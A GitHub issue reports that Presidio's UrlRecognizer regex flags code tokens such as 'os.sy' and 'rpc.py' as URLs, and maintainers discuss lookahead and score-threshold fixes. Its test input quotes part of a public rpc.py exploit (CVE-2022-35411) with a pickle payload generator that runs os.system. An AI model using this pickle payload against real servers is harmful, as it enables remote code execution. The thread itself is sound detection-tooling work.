UrlRecognizer detects many false positives when analyzing code snippets #1498

Open
gfrebello opened this issue Dec 12, 2024 · 1 comment

Comments

@gfrebello

gfrebello commented Dec 12, 2024

Describe the bug
The BASE_URL_REGEX pattern of presidio_analyzer.predefined_recognizers.url_recognizer.UrlRecognizer produces false positives when analyzing text that contains code snippets, filenames, or any other non-URL token of the form <foo>.<bar>. In particular, TLD alternatives such as (?:sy), (?:mt), and (?:py) match inside os.system (a Python function), zeus.mtia.local (a hostname), and rpc.py (a Python file), yielding the false positives os.sy, zeus.mt, and rpc.py.

To Reproduce
Install presidio_analyzer and run this:

from presidio_analyzer import AnalyzerEngine

text = '''
# Exploit Title: - rpc.py: Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 2022-07-12
# Exploit Author: Elias Hohl
# Vendor Homepage: https://github.com/abersheeran
# Software Link: https://github.com/abersheeran/rpc.py
# Version: v0.4.2 - v0.6.0
# Tested on: Debian 11, Ubuntu 20.04
# CVE : CVE-2022-35411
import requests
import pickle
HOST = "zeus.mtia.local:65432"
HEADERS = {
"serializer": "pickle"
}
def generate_payload(cmd):
  class PickleRce(object):
    def __reduce__(self):
      import os
      return os.system, (cmd,)
  payload = pickle.dumps(PickleRce())
  print(payload)
  return payload
'''

analyzer = AnalyzerEngine()
results = analyzer.analyze(text=text, entities=['URL'], language='en')
piis = []
for result in results:
    pii = text[result.start:result.end]
    piis.append(pii)

print(piis)

Expected behavior
['https://github.com/abersheeran/rpc.py', 'https://github.com/abersheeran']

Actual behavior
['https://github.com/abersheeran/rpc.py', 'https://github.com/abersheeran', 'rpc.py', 'zeus.mt', 'os.sy']

Screenshots
[Screenshot: UrlRecognizer.BASE_URL_REGEX]

Additional context
If this behavior is intended, appending the negative lookahead (?![a-z]) to the expression at least prevents false positives such as os.sy in os.system, where the matched TLD is immediately followed by more letters (see the screenshots below). Cases like rpc.py, which can be either a Python file or a valid Paraguayan URL, don't seem to have a simple solution, though.
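A minimal sketch of the lookahead idea, using only Python's re module. The pattern below is a hypothetical, heavily simplified stand-in for BASE_URL_REGEX (a dotted name followed by one of four two-letter TLDs), not the actual Presidio expression, so it only illustrates the mechanism.

```python
import re

# Hypothetical, simplified stand-in for BASE_URL_REGEX: a dotted name ending
# in one of a few two-letter TLDs. The real pattern lists far more TLDs.
TLDS = r"(?:sy|mt|py|ru)"
NAME = r"\b[a-z0-9-]+(?:\.[a-z0-9-]+)*\."

LOOSE = re.compile(NAME + TLDS)                 # no guard after the TLD
STRICT = re.compile(NAME + TLDS + r"(?![a-z])")  # TLD must not be followed by a letter


def find_all(pattern, text):
    """Return every non-overlapping match of pattern in text."""
    return [m.group(0) for m in pattern.finditer(text)]


sample = "return os.system, zeus.mtia.local, rpc.py, website.ru"

loose_hits = find_all(LOOSE, sample)
strict_hits = find_all(STRICT, sample)

print(loose_hits)   # includes the partial matches inside os.system and zeus.mtia
print(strict_hits)  # partial matches are gone; rpc.py and website.ru both remain
```

With this simplified pattern the lookahead removes os.sy and zeus.mt, but rpc.py survives because, at the regex level, it is indistinguishable from a domain such as website.ru.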

[Two screenshots illustrating the effect of adding (?![a-z])]

@gfrebello gfrebello changed the title UrlRecognizer causes false positives when analyzing code snippets UrlRecognizer detects many false positives when analyzing code snippets Dec 12, 2024
@omri374
Contributor

omri374 commented Dec 14, 2024

Thanks for raising this issue. I agree this isn't straightforward, since website.ru is a valid URL that looks just like website.py.

One way to overcome this is to set the confidence threshold above 0.5, which is the current score of the base URL pattern, so that matches produced by that pattern alone are filtered out. For a real URL, context words around the URL text can help boost the score (though not in all cases).
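The effect of such a threshold can be sketched without Presidio installed. The Detection class below is a hypothetical stand-in for an analyzer result, and the 0.6 score for the full URL is an illustrative assumption; only the 0.5 base score comes from the comment above. As far as I know, AnalyzerEngine.analyze also accepts a score_threshold argument that applies the same kind of filter inside the engine.

```python
from dataclasses import dataclass


@dataclass
class Detection:
    """Hypothetical stand-in for an analyzer result: a span plus a score."""
    start: int
    end: int
    score: float


def keep_confident(detections, threshold):
    """Keep only detections whose score reaches the threshold."""
    return [d for d in detections if d.score >= threshold]


text = "see https://github.com/abersheeran/rpc.py and os.system"
url = "https://github.com/abersheeran/rpc.py"
url_start = text.index(url)
fp_start = text.index("os.sy")

detections = [
    # Assumed score for a match that scored above the base pattern.
    Detection(url_start, url_start + len(url), 0.6),
    # Base URL pattern score of 0.5, as stated in the comment above.
    Detection(fp_start, fp_start + len("os.sy"), 0.5),
]

# Any threshold strictly above 0.5 drops base-pattern-only matches.
kept = [text[d.start:d.end] for d in keep_confident(detections, threshold=0.55)]
print(kept)
```

The trade-off is that a genuine schema-less URL with no supporting context would be dropped as well, which matches the caveat that context boosting does not help in all cases.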

If you have a suggestion for improvement, we'd be happy to review it.
